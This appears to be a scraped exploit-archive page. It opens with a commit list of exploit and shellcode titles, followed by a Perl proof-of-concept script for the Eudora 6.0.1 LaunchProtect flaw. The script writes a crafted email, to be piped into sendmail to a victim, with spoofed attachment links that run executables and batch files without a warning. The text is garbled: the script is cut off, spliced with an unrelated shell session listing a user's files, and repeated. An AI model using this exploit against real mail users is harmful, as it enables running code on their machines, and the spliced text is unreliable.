880bbe402e
14991 changes to exploits/shellcodes HTC Touch - vCard over IP Denial of Service TeamSpeak 3.0.0-beta25 - Multiple Vulnerabilities PeerBlock 1.1 - Blue Screen of Death WS10 Data Server - SCADA Overflow (PoC) Symantec Endpoint Protection 12.1.4013 - Service Disabling Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow man-db 2.4.1 - 'open_cat_stream()' Local uid=man CDRecord's ReadCD - '$RSH exec()' SUID Shell Creation CDRecord's ReadCD - Local Privilege Escalation Anyburn 4.3 x86 - 'Copy disc to image file' Buffer Overflow (Unicode) (SEH) FreeBSD - Intel SYSRET Privilege Escalation (Metasploit) CCProxy 6.2 - 'ping' Remote Buffer Overflow Savant Web Server 3.1 - Remote Buffer Overflow (2) Litespeed Web Server 4.0.17 with PHP (FreeBSD) - Remote Overflow Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow QNAP TS-431 QTS < 4.2.2 - Remote Command Execution (Metasploit) Imperva SecureSphere 13.x - 'PWS' Command Injection (Metasploit) Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Execution (Metasploit) Oracle Weblogic Server - Deserialization Remote Command Execution (Patch Bypass) TeamCity < 9.0.2 - Disabled Registration Bypass OpenSSH SCP Client - Write Arbitrary Files Kados R10 GreenBee - Multiple SQL Injection WordPress Core 5.0 - Remote Code Execution phpBB 3.2.3 - Remote Code Execution Linux/x86 - Create File With Permission 7775 + exit() Shellcode (Generator) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes)
78 lines
No EOL
3.4 KiB
Perl
Executable file
78 lines
No EOL
3.4 KiB
Perl
Executable file
source: https://www.securityfocus.com/bid/9101/info
|
|
|
|
A problem has been identified in the implementation of LaunchProtect within Eudora. Because of this, it may be possible to trick users into performing dangerous actions.
|
|
|
|
** May 21, 2004 - Eudora version 6.1.1 has been released, however, it is reported that the new versions is vulnerable to this issue as well.
|
|
|
|
#!/usr/bin/perl --
|
|
|
|
use MIME::Base64;
|
|
|
|
print "From: me\n";
|
|
print "To: you\n";
|
|
print "Subject: Eudora 6.0.1 on Windows spoof, LaunchProtect\n";
|
|
print "\n";
|
|
|
|
print "Pipe the output of this script into: sendmail -i victim\n";
|
|
|
|
print "
|
|
Eudora 6.0.1 LaunchProtect handles the X-X.exe dichotomy in the attach
|
|
directory only, and allows spoofed attachments pointing to an executable
|
|
stored elsewhere to run without warning:\n";
|
|
print "Attachment Converted\r: <a href=c:/winnt/system32/calc>go.txt</a>\n";
|
|
print "Attachment Converted\r: c:/winnt/system32/calc\n";
|
|
|
|
$X = 'README'; $Y = "$X.bat";
|
|
print "\nThe X - X.exe dichotomy: send a plain $X attachment:\n";
|
|
$z = "rem Funny joke\r\npause\r\n";
|
|
flynn@mail:~$ ls
|
|
814BlackoutReport.pdf administrivia code flying leth.txt mergemail.pl sfmutt.tgz syngress
|
|
Maildir backfill.txt docs flynn mail pics src ware
|
|
admin check eudora-launchprotex.pl igss.txt malcode.txt scripts survey
|
|
flynn@mail:~$ cat eudora-launchprotex.pl
|
|
#!/usr/bin/perl --
|
|
|
|
use MIME::Base64;
|
|
|
|
print "From: me\n";
|
|
print "To: you\n";
|
|
print "Subject: Eudora 6.0.1 on Windows spoof, LaunchProtect\n";
|
|
print "\n";
|
|
|
|
print "Pipe the output of this script into: sendmail -i victim\n";
|
|
|
|
print "
|
|
Eudora 6.0.1 LaunchProtect handles the X-X.exe dichotomy in the attach
|
|
directory only, and allows spoofed attachments pointing to an executable
|
|
stored elsewhere to run without warning:\n";
|
|
print "Attachment Converted\r: <a href=c:/winnt/system32/calc>go.txt</a>\n";
|
|
print "Attachment Converted\r: c:/winnt/system32/calc\n";
|
|
|
|
$X = 'README'; $Y = "$X.bat";
|
|
print "\nThe X - X.exe dichotomy: send a plain $X attachment:\n";
|
|
$z = "rem Funny joke\r\npause\r\n";
|
|
print "begin 600 $X\n", pack('u',$z), "`\nend\n";
|
|
print "\nand (in another message or) after some blurb so is scrolled off in
|
|
another screenful, also send $Y. Clicking on $X does not
|
|
get it any more (but gets $Y, with a LauchProtect warning):\n";
|
|
$z = "rem Big joke\r\nrem Should do something nasty\r\npause\r\n";
|
|
print "begin 600 $Y\n", pack('u',$z), "`\nend\n";
|
|
|
|
print "
|
|
Can be exploited if there is more than one way into attach: in my setup
|
|
H: and \\\\rome\\home are the same thing, but Eudora does not know that.\n";
|
|
print "These elicit warnings:\n";
|
|
print "Attachment Converted\r: <a href=h:/eudora/attach/README>readme</a>\n";
|
|
print "Attachment Converted\r: h:/eudora/attach/README\n";
|
|
print "while these do the bad thing without warning:\n";
|
|
print "Attachment Converted\r: <a href=file://rome/home/eudora/attach/README>readme</a>\n";
|
|
print "Attachment Converted\r: //rome/home/eudora/attach/README\n";
|
|
print "Attachment Converted\r: \\\\rome\\home\\eudora\\attach\\README\n";
|
|
|
|
print "
|
|
For the default setup, Eudora knows that C:\\Program Files
|
|
and C:\\Progra~1 are the same thing...\n";
|
|
print "Attachment Converted\r: \"c:/program files/qualcomm/eudora/attach/README\"\n";
|
|
print "Attachment Converted\r: \"c:/progra~1/qualcomm/eudora/attach/README\"\n";
|
|
|
|
print "\n"; |